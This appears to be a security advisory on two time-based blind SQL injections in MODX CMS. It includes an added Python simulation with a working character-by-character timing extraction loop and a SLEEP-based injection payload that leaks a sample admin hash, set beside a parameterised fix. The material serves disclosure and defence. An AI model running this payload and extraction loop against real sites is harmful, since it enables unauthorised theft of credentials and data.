MODX CMS contains two time-based blind SQL injections. The first is reachable through the session ID supplied by the user and can be exploited without authentication. The second requires authentication and is reached through the user parameter of a request to ‘/connector/security/message.php’. Either vector lets an attacker retrieve information from the database, which could eventually lead to compromise of the server.
Exploitation
Stages
- A remote, unauthenticated attacker sends a request to ‘/manager/index.php’ with a crafted PHPSESSID value in the Cookie header.
- The server passes the crafted PHPSESSID value into a MySQL query without validating it.
- Because the injection is blind, the server returns no query results directly; the attacker infers database contents (for example, password hashes) from the response delay, one true/false condition per request.
Prerequisites
None for the session ID vector. The ‘/connector/security/message.php’ vector requires an authenticated account.
Vulnerability Description
MODX CMS contains two time-based blind SQL injections. The first is exploitable through the session ID supplied by the user. It can be exploited without authentication and is caused by a lack of validation in the file ‘modsessionhandler.class.php’.
The second vector requires authentication and is exploited through the user parameter of a request to ‘/connector/security/message.php’. It is caused by a lack of input validation in the file ‘core/model/modx/processors/security/message/create.php’. Both vectors allow an attacker to retrieve information from the database, which could eventually lead to compromise of the server.
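The following is an added example, not code from MODX, Alert Logic or this advisory. It simulates the unauthenticated vector from the Stages and Vulnerability Description above: a session handler that concatenates PHPSESSID into its query, the timing-based extraction loop an attacker would drive through it, and a hardened lookup beside it. Everything specific is an assumption made for the demonstration: the table names ‘modx_session’ and ‘modx_users’, the sample rows and the sample hash, the exact query shape, and the session-ID format check (taken from PHP's own session ID alphabet and length limits, not from MODX). MySQL's SLEEP() and ASCII() are emulated in SQLite so the code runs offline and deterministically; the payload itself is valid MySQL syntax. The authenticated ‘user’ parameter vector would be driven by the same extraction loop with a different send function.

```python
import re
import sqlite3

# PHP session IDs use the alphabet 0-9a-f, 0-9a-v or 0-9a-zA-Z,- depending on
# session.sid_bits_per_character and are 22..256 characters long. This check is
# an assumption for the hardened lookup below; MODX's own handling may differ.
SESSION_ID_RE = re.compile(r"[0-9A-Za-z,-]{22,256}")

# Constructed sample value standing in for a stored password hash; not a real credential.
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"


class SimulatedSessionHandler:
    """Stand-in (not MODX code) for a session handler that looks PHPSESSID up in the database."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self._delay = 0.0
        # MySQL built-ins the payload relies on, emulated for SQLite.
        self.conn.create_function("SLEEP", 1, self._sleep)
        self.conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else 0)
        # Constructed schema and rows; table names are assumptions.
        self.conn.executescript(
            """
            CREATE TABLE modx_session (id TEXT PRIMARY KEY, data TEXT);
            CREATE TABLE modx_users (id INTEGER, username TEXT, password TEXT);
            INSERT INTO modx_session VALUES ('s3ss10n1d0fs0me0therus3r00', 'modx.user.id|i:7;');
            INSERT INTO modx_session VALUES ('an0therva1ids3ss10nid00000', 'modx.user.id|i:8;');
            """
        )
        self.conn.execute("INSERT INTO modx_users VALUES (1, 'admin', ?)", (ADMIN_HASH,))

    def _sleep(self, seconds):
        # A real MySQL SLEEP() blocks the request; here the delay is only recorded and
        # handed back, playing the role of the response time the attacker would measure.
        self._delay += seconds
        return 0

    def lookup_vulnerable(self, phpsessid):
        """Cookie value concatenated into the SQL string: the injectable pattern."""
        self._delay = 0.0
        sql = "SELECT data FROM modx_session WHERE id = '%s'" % phpsessid
        rows = self.conn.execute(sql).fetchall()
        return rows, self._delay

    def lookup_fixed(self, phpsessid):
        """Format check plus a bound parameter: the cookie value can never become SQL."""
        self._delay = 0.0
        if not SESSION_ID_RE.fullmatch(phpsessid):
            return [], 0.0
        rows = self.conn.execute(
            "SELECT data FROM modx_session WHERE id = ?", (phpsessid,)
        ).fetchall()
        return rows, self._delay


def extract_via_timing(send, sql_expr, threshold=1.0, max_len=64):
    """Recover the value of sql_expr one character at a time using only response delay.

    send(payload) plays the role of one HTTP request carrying payload as PHPSESSID and
    returns (response, seconds_taken). Each character costs 7 requests (binary search
    over ASCII 0..127); the first position that reads as 0 marks the end of the value.
    """
    value = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"ASCII(substr(({sql_expr}), {pos}, 1)) > {mid}"
            # OR makes the CASE run for every session row, so a true condition
            # always costs at least one SLEEP; '-- -' comments out the closing quote.
            payload = f"' OR (CASE WHEN {cond} THEN SLEEP(1) ELSE 0 END)-- -"
            _, delay = send(payload)
            if delay >= threshold:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        value += chr(lo)
    return value


def run_demo():
    handler = SimulatedSessionHandler()
    target = "SELECT password FROM modx_users WHERE username = 'admin'"
    leaked = extract_via_timing(handler.lookup_vulnerable, target)
    # The same kind of payload against the hardened lookup is rejected before it reaches SQL,
    # while a well-formed session ID still resolves normally.
    blocked = handler.lookup_fixed("' OR SLEEP(1)-- -")
    valid_rows, _ = handler.lookup_fixed("s3ss10n1d0fs0me0therus3r00")
    return {"leaked": leaked, "blocked": blocked, "valid_lookup": valid_rows}


if __name__ == "__main__":
    print(run_demo())
```

The extraction needs roughly seven requests per character, which is why time-based blind injection is slow but still sufficient to pull a whole hash column. The bound parameter in lookup_fixed is the actual fix; the format check is defence in depth that also rejects the payload before any query runs.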
Alert Logic Coverage
Alert Logic® has evaluated its customer base for exposure to the exploit and has developed signatures for detecting the threat, depending on the security service in place.
The Network-Based Intrusion Detection System (IDS) has been updated with new signatures for this exploit. When Alert Logic Threat Manager™ detects a match, an incident is generated in the Alert Logic console.
Recommendations for Mitigation
- Update to a non-vulnerable version (> 2.1.77).
- Check user permissions. Ensure that only you and trusted team members have administrator access to the site, since the second vector requires an authenticated account.